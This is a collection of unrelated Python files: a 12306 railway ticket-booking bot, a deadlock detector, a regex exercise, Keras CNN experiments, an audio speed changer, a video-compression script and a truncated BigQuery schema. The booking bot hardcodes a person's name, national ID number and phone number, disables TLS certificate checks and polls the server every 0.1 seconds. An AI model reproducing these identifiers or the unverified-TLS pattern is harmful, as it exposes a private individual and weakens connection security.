ruc = self.session.post(url=uclient,headers=self.header,data=ucdata,verify=False)
print(ruc.text)
return ruc.json()
#######5. queryticket#######################################################
def queryticket(self):
queryTicketRoot = "https://kyfw.12306.cn/otn/leftTicket/queryZ"
traindate = "2018-02-15"#time.strftime('%Y-%m-%d',time.localtime(time.time()))
fromstation = "SZQ"
tostation = "WXN"
ticketPam = {"leftTicketDTO.train_date":traindate,
"leftTicketDTO.from_station":fromstation,
"leftTicketDTO.to_station":tostation,
"purpose_codes":"ADULT"
}
rqt = self.session.get(queryTicketRoot,params=ticketPam,headers=self.header,verify=False)
#print(rqt.text)
ticketinfos = rqt.json()["data"]["result"]
secretStr = ""
for info in ticketinfos:
ticketInfo = info.split("|")
#print(ticketInfo)
secretHBStr = ticketInfo[36];
secretStr = ticketInfo[0]
buttonTextInfo = ticketInfo[1];
train_no = ticketInfo[2];
#车次
station_train_code = ticketInfo[3];
start_station_telecode = ticketInfo[4];
end_station_telecode = ticketInfo[5];
from_station_telecode = ticketInfo[6];
to_station_telecode = ticketInfo[7];
#始发时间
start_time = ticketInfo[8];
arrive_time = ticketInfo[9];
lishi = ticketInfo[10];
canWebBuy = ticketInfo[11];
#余票信息?
yp_info = ticketInfo[12];
start_train_date = ticketInfo[13];
train_seat_feature = ticketInfo[14];
location_code = ticketInfo[15];
from_station_no = ticketInfo[16];
to_station_no = ticketInfo[17];
is_support_card = ticketInfo[18];
controlled_train_flag = ticketInfo[19];
gg_num = ticketInfo[20]
gr_num = ticketInfo[21]
qt_num = ticketInfo[22]
#软卧
rw_num = ticketInfo[23]
rz_num = ticketInfo[24]
tz_num = ticketInfo[25]
#无座
wz_num = ticketInfo[26]
yb_num = ticketInfo[27]
#硬卧
yw_num = ticketInfo[28]
#硬座
yz_num = ticketInfo[29]
ze_num = ticketInfo[30]
zy_num = ticketInfo[31]
swz_num = ticketInfo[32]
rrb_num = ticketInfo[33]
yp_ex = ticketInfo[34]
seat_types = ticketInfo[35]
print(station_train_code,"始发时间:",start_train_date,start_time,"硬座:",yz_num,"硬卧:",yw_num)
if secretStr != "":
print("有票")
return secretStr,yp_info
else:
print(time.strftime('%H:%M:%S',time.localtime(time.time())),"无票")
time.sleep(0.1)
self.queryticket()
#########GetPasssengerInfo##################################################
def getpassengerinfo(self):
getpsgurl ="https://kyfw.12306.cn/otn/confirmPassenger/getPassengerDTOs"
psgdata = {"REPEAT_SUBMIT_TOKEN":"c412871cf1417f65f9e1f2c73b52d71d"}
rpsg = self.session.post(getpsgurl,headers=self.header,data=psgdata,verify=False)
print(rpsg.text)
##################checkuser################################################
def checkuser(self):
checkusrurl = "https://kyfw.12306.cn/otn/login/checkUser"
rcu = self.session.post(checkusrurl,headers=self.header,verify=False)
print(rcu.text)
return rcu.json()["data"]["flag"]
############submitorderrequest#################################################
def submitorderrequest(self):
suborderurl = "https://kyfw.12306.cn/otn/leftTicket/submitOrderRequest"
subdata = {
"secretStr":"BWrC4LCammzezl3prL0K/4maDENFl+1ibz3ngJ74mP4NgMaP+K8Xsk6mPpp1NVzl1M0YOoi3Xnon",
"train_date":"2018-02-14",
"back_train_date":"2018-01-16",
"tour_flag":"dc",
"purpose_codes":"ADULT",
"query_from_station_name":"深圳",
"query_to_station_name":"武穴",
"undefined":""
}
rsub = self.session.post(suborderurl,headers=self.header,data=subdata,verify=False)
print(rsub.text)
##########checkorderinfo#####################################
def checkorderinfo(self):
checkorderurl = "https://kyfw.12306.cn/otn/confirmPassenger/checkOrderInfo"
checkdata = {
"cancel_flag":2,
"bed_level_order_num":"000000000000000000000000000000",
"passengerTicketStr":"1%2C0%2C1%2C%E9%98%AE%E7%81%BF%E5%BB%BA%2C1%2C421182198309214177%2C15818575246%2CN",
"oldPassengerStr":"%E9%98%AE%E7%81%BF%E5%BB%BA%2C1%2C421182198309214177%2C1_",
"tour_flag":"dc",
"randCode":"",
"whatsSelect":1,
"REPEAT_SUBMIT_TOKEN":"c412871cf1417f65f9e1f2c73b52d71d"
}
rcheck = self.session.post(checkorderurl,headers=self.header,data=checkdata,verify=False)
print(rcheck.text)
#########getQueueCount#############
def getqueuecount(self):
getqueurl = "https://kyfw.12306.cn/otn/confirmPassenger/getQueueCount"
quedata = {
"train_date":"Thu+Feb+15+2018+00%3A00%3A00+GMT%2B0800+(China+Standard+Time)",
"train_no":"650000K82402",
"stationTrainCode":"K824",
"seatType":1,
"fromStationTelecode":"BJQ",
"toStationTelecode":"WXN",
"leftTicket":"5G1YAQoXFCB063z0qu7F8WYFK4OiLgTK8S4IZXiyeejNJukvHZ%2FHvtmO%2BH8%3D",
"purpose_codes":"00",
"train_location":"Q7",
"_json_att":"",
"REPEAT_SUBMIT_TOKEN":"c412871cf1417f65f9e1f2c73b52d71d"
}
rq = self.session.post(getqueurl,headers=self.header,data=quedata,verify=False)
print(rq.text)
##########confirmSingleForQueue#######################
def confirmsingleforqueue(self):
confurl = "https://kyfw.12306.cn/otn/confirmPassenger/confirmSingleForQueue"
condata = {
"passengerTicketStr":"1,0,1,阮灿建,1,421182198309214177,15818575246,N",
"oldPassengerStr":"阮灿建,1,421182198309214177,1_",
"randCode":"",
"purpose_codes":"00",
"key_check_isChange":"9EFBA275BC092DDC2C058DCCAF680A7A6D8A463718E8BD571AB5F0C3",
"leftTicketStr":"5G1YAQoXFCB063z0qu7F8WYFK4OiLgTK8S4IZXiyeejNJukvHZ%2FHvtmO%2BH8%3D",
"train_location":"Q7",
"choose_seats":"",
"seatDetailType":"000",
"whatsSelect":1,
"roomType":"00",
"dwAll":"N",
"REPEAT_SUBMIT_TOKEN":"c412871cf1417f65f9e1f2c73b52d71d"
}
rcon = self.session.post(confurl,headers=self.header,data=condata,verify=False)
print(rcon.text)
###########queryOrderWaitTime#################################
def queryorderwaittime(self):
qurl = "https://kyfw.12306.cn/otn/confirmPassenger/queryOrderWaitTime"
param ={
"random":"1516086113921",
"tourFlag":"dc",
"_json_att":"",
"REPEAT_SUBMIT_TOKEN":"c412871cf1417f65f9e1f2c73b52d71d"
}
rq = self.session.get(qurl,headers=self.header,params=param,verify=False)
print(rq.text)
#############resultOrderForDcQueue########################
def resultorderforqueue(self):
rurl = "https://kyfw.12306.cn/otn/confirmPassenger/resultOrderForDcQueue"
rdata = {
"orderSequence_no":"EA39818077",
"_json_att":"",
"REPEAT_SUBMIT_TOKEN":"c412871cf1417f65f9e1f2c73b52d71d"
}
rr = self.session.post(rurl,headers=self.header,data=rdata,verify=False)
print(rr.text)
#resultl = loginto(se,header)
#uamtk(se,header)
#queryticket(se,header)
#getpassengerinfo(se,header)
#checkuser(se,header)
#submitorderrequest(se,header)
#checkorderinfo(se,header)
#getqueuecount(se,header)
#confirmsingleforqueue(se,header)
#queryorderwaittime(se,header)
#resultorderforqueue(se,header)
|
# Deadlock Detection, similar to Banker's
from banker import Banker, sumColumn, IncrVec, DecrVec, GtVec, LeVec
class DeadlockDetector(Banker):
def __init__(self, alloc, totalRsrc):
Banker.__init__(self, alloc, None, totalRsrc)
def detect(self, Request):
'''detect deadlock with the request matrix'''
# 1(a) initialize Work = a copy of Available
Work = self.Available[:]
# 1(b) Finish[i] = (Allocation[i] == [0, ...0])
Finish = [False for i in range(self.n)]
for i in range(self.n):
Finish[i] = all(v == 0 for v in self.Allocation[i])
# optionally, you can keep a Sequence list
Sequence = []
print('Finish=%s' % Finish)
cycle = 0
for _ in range(self.n):
for i in range(self.n):
# Step 2: similar to safety algorithm
# if there is an i such that (Finish[i] == False)
# and Request_i <= Work, (hint: LeVec() or GtVec()) then
# Step 3:
# Work += Allocation[i] # hint IncrVec()
# Finish[i] = True
# continue Step 2
if Finish[i] is False:
print('i=%d, ' % i, end="")
print('(Request[%d]=%s' % (i, Request[i]), end=' ')
print('<= Work=%s)' % Work, end=' ')
if LeVec(Request[i], Work):
print('True, append P%d' % i)
Sequence.append(i)
IncrVec(Work, self.Allocation[i])
Finish[i] = True
print('(+Allocation[%d]=' % i, end='')
print(self.Allocation[i], end=')')
print('=> Work=%s' % Work, end=',')
print('Finish=%s' % Finish)
else:
print('False, P%d must wait' % i)
else:
cycle += 1
if cycle > 1:
return None
print('i=%d, ' % i, end="")
print('Finish[%d] True, skipping' % i)
# Step 4: either done iterating or (no such i exists)
# Finish vector indicates deadlocked processes.
# if all True then no deadlock.
if False not in Finish:
return Sequence
return None
if __name__ == '__main__':
Allocation = [[0, 1, 0], [2, 0, 0], [3, 0, 3], [2, 1, 1], [0, 0, 2]]
Request1 = [[0, 0, 0], [2, 0, 2], [0, 0, 0], [1, 0, 0], [0, 0, 2]]
Request2 = [[0, 0, 0], [2, 0, 2], [0, 0, 1], [1, 0, 0], [0, 0, 2]]
Available = [0, 0, 0]
TotalResources = [7, 2, 6]
d = DeadlockDetector(Allocation, TotalResources)
s = d.detect(Request1)
if s is not None:
print('sequence = %s' % s)
else:
print('deadlock')
s = d.detect(Request2)
if s is not None:
print('sequence = %s' % s)
else:
print('deadlock')
|
# -*- coding: utf-8 -*-
"""
存放第3方扩展库
"""
|
import re
pattern = r"(\*|@)([A-Z][a-z]{2,})\1: \[([A-Za-z])\]\|\[([A-Za-z])\]\|\[([A-Za-z])\]\|$"
n = int(input())
for _ in range(n):
message = input()
valid_message = re.findall(pattern, message)
if len(valid_message) == 0:
print("Valid message not found!")
else:
print(f"{valid_message[0][1]}: {ord(valid_message[0][2])} {ord(valid_message[0][3])} {ord(valid_message[0][4])}")
|
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 25 13:04:01 2018
@author: Rafael Rocha
"""
import numpy as np
import keras
from sklearn.metrics import classification_report, confusion_matrix
from keras.optimizers import SGD, Adam, Adagrad, RMSprop
from keras.losses import categorical_crossentropy
from sklearn.model_selection import train_test_split, cross_val_score, KFold
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras.layers import Input
from keras.models import Model
from keras import backend as K
from keras.wrappers.scikit_learn import KerasClassifier
from sklearn.ensemble import VotingClassifier
data_set_name = 'train_test_splits_3.npz'
data = np.load(data_set_name)
x = data['x']
y = data['y']
train_index = data['train_index']
test_index = data['test_index']
# samples = data['samples']
x_train, y_train = x[train_index], y[train_index]
x_test, y_test = x[test_index], y[test_index]
# x_train_sample, y_train_sample = x_train[samples[0]], y_train[samples[0]]
# x_test = data['x_test']
# y_test = data['y_test']
x_train = x_train.reshape(x_train.shape[0], 128, 256, 1)
x_test = x_test.reshape(x_test.shape[0], 128, 256, 1)
input_shape = (np.size(x_train, 1), np.size(x_train, 2), 1)
def build_model_sequential_1():
model = keras.Sequential()
model.add(Conv2D(32, kernel_size=(3, 3), strides=1, activation='relu',
input_shape=input_shape))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dense(3, activation='softmax'))
model.compile(loss=categorical_crossentropy,
optimizer=SGD(lr=0.01, momentum=.3),
metrics=['accuracy'])
return model
def build_model_sequential_2():
model = keras.Sequential()
model.add(Conv2D(32, kernel_size=(5, 5), strides=1, activation='relu',
input_shape=input_shape))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dense(3, activation='softmax'))
model.compile(loss=categorical_crossentropy,
optimizer=SGD(lr=0.01, momentum=.3),
metrics=['accuracy'])
return model
def build_model_sequential_3():
model = keras.Sequential()
model.add(Conv2D(32, kernel_size=(5, 5), strides=5, activation='relu',
input_shape=input_shape))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dense(3, activation='softmax'))
model.compile(loss=categorical_crossentropy,
optimizer=SGD(lr=0.01, momentum=.3),
metrics=['accuracy'])
return model
def build_model_sequential_4():
model = keras.Sequential()
model.add(Conv2D(32, kernel_size=(11, 11), strides=5, activation='relu',
input_shape=input_shape))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dense(3, activation='softmax'))
model.compile(loss=categorical_crossentropy,
optimizer=SGD(lr=0.01, momentum=.3),
metrics=['accuracy'])
return model
def build_model_sequential_5():
# lenet
model = keras.Sequential()
model.add(Conv2D(20, kernel_size=(5, 5), strides=1,
padding='same', activation='tanh',
input_shape=input_shape))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(50, kernel_size=(5, 5), strides=(
5, 5), padding='same', activation='tanh'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(500, activation='tanh'))
model.add(Dense(3, activation='softmax'))
model.compile(loss=categorical_crossentropy,
optimizer=SGD(lr=0.01, momentum=0.3),
metrics=['accuracy'])
return model
def build_model_sequential_6():
# lenet_5
model = keras.Sequential()
model.add(Conv2D(20, kernel_size=(5, 5), strides=5,
padding='same', activation='tanh',
input_shape=input_shape))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(50, kernel_size=(5, 5), strides=(
5, 5), padding='same', activation='tanh'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(500, activation='tanh'))
model.add(Dense(3, activation='softmax'))
model.compile(loss=categorical_crossentropy,
optimizer=SGD(lr=0.01, momentum=0.3),
metrics=['accuracy'])
return model
# results = []
model_1 = KerasClassifier(build_fn=build_model_sequential_6,
epochs=20,
verbose=1)
model_1.fit(x_train, y_train)
y_pred = model_1.predict(x_test)
print(classification_report(y_test, y_pred, digits=4))
print(confusion_matrix(y_test, y_pred))
# results.append(y_pred)
print(y_pred)
#np.savetxt('Lenet_results_100_7.txt', [y_pred], fmt='%i', delimiter=',')
# model_1.fit()
|
import ctypes
import numpy as np
from numpy.ctypeslib import ndpointer
from scipy.io import wavfile
import os
import glob
def speed_change(in_wav, out_wav, lib_file="./speed_change.dll", speed_rate=2):
"""
args:
in_wav: 输入wav文件的路径
out_wav: 语速改变后wav文件的输出路径
lib_file: 编译的c代码
speed_rate: 语速提升多少
"""
fs, wav = wavfile.read(in_wav) #读取wav文件的采样率和数据
wav_len = len(wav) # 输入长度
out_len = round(wav_len/speed_rate) #输出长度
## 调用编译好的c库
lib = ctypes.cdll.LoadLibrary
sonic_lib = lib(lib_file)
wav_speech_change = sonic_lib.wavChangeSpeed
wav_speech_change.argtypes = [ndpointer(ctypes.c_short), ndpointer(
ctypes.c_short), ctypes.c_int, ctypes.c_int, ctypes.c_int, ctypes.c_float]
wav_speech_change.restypes = None
result = np.zeros([out_len], dtype=np.int16)
wav_speech_change(wav, result, 1, fs, wav.shape[0], speed_rate)
wavfile.write(out_wav, fs, result) # 将变化语速后的数据写成wav文件
return result
if __name__ == "__main__":
wav_input = "./test/normal.wav"
wav_output = "./test/speedup.wav"
lib_file = "./speed_change.dll"
## 编译c代码,生成库
os.system("gcc -o " + lib_file + " -shared -fPIC runsonic.c sonic.c sonic.h")
## 变速
speed_change(wav_input, wav_output, lib_file="./speed_change.dll")
|
import argparse
import numpy as np
import tensorflow as tf
import tensorflow_compression as tfc
import os
from scipy import misc
import CNN_recurrent
import motion
import functions
import helper
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
config = tf.ConfigProto(allow_soft_placement=True)
sess = tf.Session(config=config)
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--path", default='BasketballPass')
parser.add_argument("--frame", type=int, default=100)
parser.add_argument("--f_P", type=int, default=6)
parser.add_argument("--b_P", type=int, default=6)
parser.add_argument("--mode", default='PSNR', choices=['PSNR', 'MS-SSIM'])
parser.add_argument("--metric", default='PSNR', choices=['PSNR', 'MS-SSIM'])
parser.add_argument("--python_path", default='path_to_python')
parser.add_argument("--CA_model_path", default='path_to_CA_EntropyModel_Test')
parser.add_argument("--l", type=int, default=1024, choices=[8, 16, 32, 64, 256, 512, 1024, 2048])
parser.add_argument("--N", type=int, default=128, choices=[128])
parser.add_argument("--M", type=int, default=128, choices=[128])
args = parser.parse_args()
# Settings
I_level, Height, Width, batch_size, Channel, \
activation, GOP_size, GOP_num, \
path, path_com, path_bin, path_lat = helper.configure(args)
# Placeholder
Y0_com_tensor = tf.placeholder(tf.float32, [batch_size, Height, Width, Channel]) # reference frame
Y1_raw_tensor = tf.placeholder(tf.float32, [batch_size, Height, Width, Channel]) # raw frame to compress
hidden_states = tf.placeholder(tf.float32, [8, batch_size, Height//4, Width//4, args.N]) # hidden states in RAE
c_enc_mv, h_enc_mv, \
c_dec_mv, h_dec_mv, \
c_enc_res, h_enc_res, \
c_dec_res, h_dec_res = tf.split(hidden_states, 8, axis=0)
RPM_flag = tf.placeholder(tf.bool, []) # use RPM (=1) or bottleneck (=0)
# motion estimation
with tf.variable_scope("flow_motion"):
motion_tensor, _, _, _, _, _ = motion.optical_flow(Y0_com_tensor, Y1_raw_tensor, batch_size, Height, Width)
# RAE encoder for motion
motion_latent, c_enc_mv_out, h_enc_mv_out = CNN_recurrent.MV_analysis(motion_tensor, num_filters=args.N, out_filters=args.M,
Height=Height, Width=Width,
c_state=c_enc_mv[0], h_state=h_enc_mv[0], act=activation)
# encode the latent of the first P frame by the bottleneck
entropy_bottleneck = tfc.EntropyBottleneck(name='entropy_bottleneck')
string = tf.squeeze(entropy_bottleneck.compress(motion_latent), axis=0)
motion_latent_decom = entropy_bottleneck.decompress(tf.expand_dims(string, 0), [Height//16, Width//16, args.M], channels=args.M)
motion_latent_hat = tf.cond(RPM_flag, lambda: tf.round(motion_latent), lambda: motion_latent_decom)
# RAE decoder for motion
motion_hat, c_dec_mv_out, h_dec_mv_out = CNN_recurrent.MV_synthesis(motion_latent_hat, num_filters=args.N,
Height=Height, Width=Width,
c_state=c_dec_mv[0], h_state=h_dec_mv[0], act=activation)
# Motion Compensation
Y1_warp = tf.contrib.image.dense_image_warp(Y0_com_tensor, motion_hat)
MC_input = tf.concat([motion_hat, Y0_com_tensor, Y1_warp], axis=-1)
Y1_MC = functions.MC_RLVC(MC_input)
# Get residual
Res = Y1_raw_tensor - Y1_MC
# RAE encoder for residual
res_latent, c_enc_res_out, h_enc_res_out = CNN_recurrent.Res_analysis(Res, num_filters=args.N, out_filters=args.M,
Height=Height, Width=Width,
c_state=c_enc_res[0], h_state=h_enc_res[0], act=activation)
# encode the latent of the first P frame by the bottleneck
entropy_bottleneck2 = tfc.EntropyBottleneck(name='entropy_bottleneck_1_1')
string2 = entropy_bottleneck2.compress(res_latent)
string2 = tf.squeeze(string2, axis=0)
res_latent_decom = entropy_bottleneck2.decompress(tf.expand_dims(string2, 0), [Height//16, Width//16, args.M], channels=args.M)
res_latent_hat = tf.cond(RPM_flag, lambda: tf.round(res_latent), lambda: res_latent_decom)
# RAE decoder for residual
res_hat, c_dec_res_out, h_dec_res_out = CNN_recurrent.Res_synthesis(res_latent_hat, num_filters=args.N,
Height=Height, Width=Width,
c_state=c_dec_res[0], h_state=h_dec_res[0], act=activation)
# reconstructed frame
Y1_decoded = tf.clip_by_value(res_hat + Y1_MC, 0, 1)
# output hidden states
hidden_states_out = tf.stack([c_enc_mv_out, h_enc_mv_out,
c_dec_mv_out, h_dec_mv_out,
c_enc_res_out, h_enc_res_out,
c_dec_res_out, h_dec_res_out], axis=0)
# PANR or MS-SSIM
if args.metric == 'PSNR':
mse = tf.reduce_mean(tf.squared_difference(Y1_decoded, Y1_raw_tensor))
quality_tensor = 10.0*tf.log(1.0/mse)/tf.log(10.0)
elif args.metric == 'MS-SSIM':
quality_tensor = tf.math.reduce_mean(tf.image.ssim_multiscale(Y1_decoded, Y1_raw_tensor, max_val=1))
# load model
saver = tf.train.Saver(max_to_keep=None)
model_path = './model/RAE_' + args.mode + '_' + str(args.l)
saver.restore(sess, save_path=model_path + '/model.ckpt')
# init quality
quality_frame = np.zeros([args.frame])
# encode the first I frame
frame_index = 1
quality = helper.encode_I(args, frame_index, I_level, path, path_com, path_bin)
quality_frame[frame_index - 1] = quality
# encode GOPs
for g in range(GOP_num):
# forward P frames
# load I frame (compressed)
frame_index = g * GOP_size + 1
F0_com = misc.imread(path_com + 'f' + str(frame_index).zfill(3) + '.png')
F0_com = np.expand_dims(F0_com, axis=0)
for f in range(args.f_P):
# load P frame (raw)
frame_index = g * GOP_size + f + 2
F1_raw = misc.imread(path + 'f' + str(frame_index).zfill(3) + '.png')
F1_raw = np.expand_dims(F1_raw, axis=0)
# init hidden states
if f % 6 == 0:
h_state = np.zeros([8, batch_size, Height // 4, Width // 4, args.N], dtype=np.float)
# since the model is optimized on 6 frames, we reset hidden states every 6 P frames
if f == 0:
flag = False
# the first P frame uses bottleneck
else:
flag = True
# run RAE
F0_com, string_MV, string_Res, quality, h_state, latent_mv, latent_res \
= sess.run([Y1_decoded, string, string2, quality_tensor,
hidden_states_out, motion_latent_hat, res_latent_hat],
feed_dict={Y0_com_tensor: F0_com / 255.0, Y1_raw_tensor: F1_raw / 255.0,
hidden_states: h_state, RPM_flag: flag})
F0_com = F0_com * 255
# save bottleneck bitstream
if not flag:
with open(path_bin + '/f' + str(frame_index).zfill(3) + '.bin', "wb") as ff:
ff.write(np.array(len(string_MV), dtype=np.uint16).tobytes())
ff.write(string_MV)
ff.write(string_Res)
# save compressed frame and latents
misc.imsave(path_com + '/f' + str(frame_index).zfill(3) + '.png', np.uint8(np.round(F0_com[0])))
np.save(path_lat + '/f' + str(frame_index).zfill(3) + '_mv.npy', latent_mv)
np.save(path_lat + '/f' + str(frame_index).zfill(3) + '_res.npy', latent_res)
quality_frame[frame_index - 1] = quality
print('Frame', frame_index, args.metric + ' =', quality)
# encode the next I frame
frame_index = (g + 1) * GOP_size + 1
quality = helper.encode_I(args, frame_index, I_level, path, path_com, path_bin)
quality_frame[frame_index - 1] = quality
# backward P frames
# load I frame (compressed)
F0_com = misc.imread(path_com + 'f' + str(frame_index).zfill(3) + '.png')
F0_com = np.expand_dims(F0_com, axis=0)
for f in range(args.b_P):
# load P frame (raw)
frame_index = (g + 1) * GOP_size - f
F1_raw = misc.imread(path + 'f' + str(frame_index).zfill(3) + '.png')
F1_raw = np.expand_dims(F1_raw, axis=0)
# init hidden states
if f % 6 == 0:
h_state = np.zeros([8, batch_size, Height // 4, Width // 4, args.N], dtype=np.float)
# since the model is optimized on 6 frames, we reset hidden states every 6 P frames
if f == 0:
flag = False
# the first P frame uses bottleneck
else:
flag = True
# run RAE
F0_com, string_MV, string_Res, quality, h_state, latent_mv, latent_res \
= sess.run([Y1_decoded, string, string2, quality_tensor,
hidden_states_out, motion_latent_hat, res_latent_hat],
feed_dict={Y0_com_tensor: F0_com / 255.0, Y1_raw_tensor: F1_raw / 255.0,
hidden_states: h_state, RPM_flag: flag})
F0_com = F0_com * 255
# save bottleneck bitstream
if not flag:
with open(path_bin + '/f' + str(frame_index).zfill(3) + '.bin', "wb") as ff:
ff.write(np.array(len(string_MV), dtype=np.uint16).tobytes())
ff.write(string_MV)
ff.write(string_Res)
# save compressed frame and latents
misc.imsave(path_com + '/f' + str(frame_index).zfill(3) + '.png', np.uint8(np.round(F0_com[0])))
np.save(path_lat + '/f' + str(frame_index).zfill(3) + '_mv.npy', latent_mv)
np.save(path_lat + '/f' + str(frame_index).zfill(3) + '_res.npy', latent_res)
quality_frame[frame_index - 1] = quality
print('Frame', frame_index, args.metric + ' =', quality)
# encode rest frames
rest_frame_num = args.frame - 1 - GOP_size * GOP_num
# load I frame (compressed)
frame_index = GOP_num * GOP_size + 1
F0_com = misc.imread(path_com + 'f' + str(frame_index).zfill(3) + '.png')
F0_com = np.expand_dims(F0_com, axis=0)
for f in range(rest_frame_num):
# load P frame (raw)
frame_index = GOP_num * GOP_size + f + 2
F1_raw = misc.imread(path + 'f' + str(frame_index).zfill(3) + '.png')
F1_raw = np.expand_dims(F1_raw, axis=0)
# init hidden states
if f % 6 == 0:
h_state = np.zeros([8, batch_size, Height // 4, Width // 4, args.N], dtype=np.float)
# since the model is optimized on 6 frames, we reset hidden states every 6 P frames
if f == 0:
flag = False
# the first P frame uses the bottleneck
else:
flag = True
# run RAE
F0_com, string_MV, string_Res, quality, h_state, latent_mv, latent_res \
= sess.run([Y1_decoded, string, string2, quality_tensor,
hidden_states_out, motion_latent_hat, res_latent_hat],
feed_dict={Y0_com_tensor: F0_com / 255.0, Y1_raw_tensor: F1_raw / 255.0,
hidden_states: h_state, RPM_flag: flag})
F0_com = F0_com * 255
# save bottleneck bitstream
if not flag:
with open(path_bin + '/f' + str(frame_index).zfill(3) + '.bin', "wb") as ff:
ff.write(np.array(len(string_MV), dtype=np.uint16).tobytes())
ff.write(string_MV)
ff.write(string_Res)
# save compressed frame and latents
misc.imsave(path_com + '/f' + str(frame_index).zfill(3) + '.png', np.uint8(np.round(F0_com[0])))
np.save(path_lat + '/f' + str(frame_index).zfill(3) + '_mv.npy', latent_mv)
np.save(path_lat + '/f' + str(frame_index).zfill(3) + '_res.npy', latent_res)
quality_frame[frame_index - 1] = quality
print('Frame', frame_index, args.metric + ' =', quality)
print('Average ' + args.metric + ':', np.average(quality_frame))
|
#encoding: utf-8
from __future__ import print_function, absolute_import
import logging
import re
import json
import requests
import uuid
import time
import os
import argparse
import uuid
import datetime
import socket
import apache_beam as beam
from apache_beam.io import ReadFromText
from apache_beam.io import WriteToText
from apache_beam.io.filesystems import FileSystems
from apache_beam.metrics import Metrics
from apache_beam.metrics.metric import MetricsFilter
from apache_beam import pvalue
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.options.pipeline_options import SetupOptions
TABLE_SCHEMA = (
'idkey:STRING, '
'fecha:STRING, '
'ID:STRING, '
'USER_ID:STRING, '
'LINK:STRING, '
'FECHA_INGRESO_REGISTRO:STRING, '
'HORA_INGRESO_REGISTRO:STRING, '
'VACIO1:STRING, '
'VACIO2:STRING, '
'CEDULA_AGENTE:STRING, '
'CORREO_AGENTE:STRING, '
'PAIS:STRING, '
'CIUDAD:STRING, '
'NOMBRE_AGENTE:STRING, '
'FECHA_CARGUE_B:STRING, '
'FECHA_GESTION:STRING, '
'HORA_GESTION:STRING, '
'TIPIFICACION1:STRING, '
'FECHA_SOLUCION:STRING, '
'HORA_SOLUCION:STRING, '
'OBSERVACIONES:STRING, '
'ALERT1:STRING, '
'TIPIFICACION2:STRING, '
'TIPIFICACION3:STRING, '
'VACIO6:STRING, '
'ESTADO_REGISTRO:STRING, '
'TIPO_GESTION_BASE:STRING, '
'ROL:STRING, '
'FECHA_GESTION2:STRING, '
'TIPO_DE_CREDITO:STRING, '
'PRODUCTO_DE_INTERES:STRING, '
'VACIO3:STRING, '
'VACIO4:STRING, '
'MES_CARGUE:STRING, '
'MES_GESTION:STRING, '
'DATOS_1:STRING, '
'DATOS_2:STRING, '
'DATOS_3:STRING, '
'DATOS_4:STRING, '
'DATOS_5:STRING, '
'ESTADO_PROCESO_VENTA:STRING, '
'DATOS_7:STRING, '
'DATOS_8:STRING, '
'GESTION_CON_LLAMADA:STRING, '
'VACIO7:STRING, '
'VACIO8:STRING, '
'PRIMER_NOMBRE:STRING, '
'SEGUNDO_NOMBRE:STRING, '
'PRIMER_APELLIDO:STRING, '
'SEGUNDO_APELLIDO:STRING, '
'FECHA_DE_NACIMIENTO:STRING, '
'SALARIO:STRING, '
'VALOR_SUBSIDIO:STRING, '
'SUBSIDIOS_RECIBIDOS:STRING, '
'PAC_A_CARGO:STRING, '
'TIPO_DE_EMPLEADOR:STRING, '
'TIPO_NACIONALIDAD:STRING, '
'TIPO_IDENTIFICACION:STRING, '
'NOMBRE_COMPLETO:STRING, '
'SEXO:STRING, '
'GRUO_ESTADO_CIVIL:STRING, '
'DEPTO:STRING, '
'CIUDAD2:STRING, '
'PAIS2:STRING, '
'TIPO_DE_AFILIADO:STRING, '
'GRUPO_DE_AFILIADO:STRING, '
'CATEGORIA_DE_AFILIACION:STRING, '
'RECIBE_SUBSIDIO:STRING, '
'RECIBE_SUBSIDIO2:STRING, '
'EDAD:STRING, '
'ENTRE_0_Y_05_ANOS:STRING, '
'ENTRE_06_Y_10_ANOS:STRING, '
'ENTRE_11_Y_18_ANOS:STRING, '
'ENTRE_19_Y_23_ANOS:STRING, '
'ENTRE_24_Y_25_ANOS:STRING, '
'MAYORES_DE_25_ANOS:STRING, '
'TOTAL_HIJOS:STRING, '
'TIENE_HIJOS:STRING, '
'NIT:STRING, '
'ASESOR_ESPECIALIZADO:STRING, '
'SEGMENTO:STRING, '
'CANAL_ABORDAJE_TELEFONICO:STRING, '
'CHECK_ABORDAJE:STRING, '
'ANTIGUEDAD:STRING, '
'MONTO_SOLICITADO:STRING, '
'PLAZO:STRING, '
'TASA:STRING, '
'LINEA:STRING, '
'SOLICITUD_ULTIMOS_3_MESES:STRING, '
'SOLICITUD_ULTIMOS_6_MESES:STRING, '
'SALDOVENCIDO:STRING, '
'SALDOVIGENTE:STRING, '
'DIASATRASO:STRING, '
'MONTO_DESEMBOLSADO:STRING, '
'PLAZO_1:STRING, '
'TASA_1:STRING, '
'CUOTAS_PENDIENTES:STRING, '
'SALDO_PENDIENTE:STRING, '
'CREDITO_ACTIVO:STRING, '
'LINEA_1:STRING, '
'DESEMBOLSO_ULTIMOS_3_MESES:STRING, '
'DESEMBOLSO_ULTIMOS_6_MESES:STRING, '
'NOMBRE_EMPRESA:STRING, '
'ESTADO:STRING, '
'NOMTIPO:STRING, '
'GRUPO_ACTIVIDAD_ECONOMICA:STRING, '
'TIPO_DE_APORTANTE:STRING, '
'SECTOR:STRING, '
'TAMANO:STRING, '
'DIRECCION_NORMALIZADA:STRING, '
'BARRIO:STRING, '
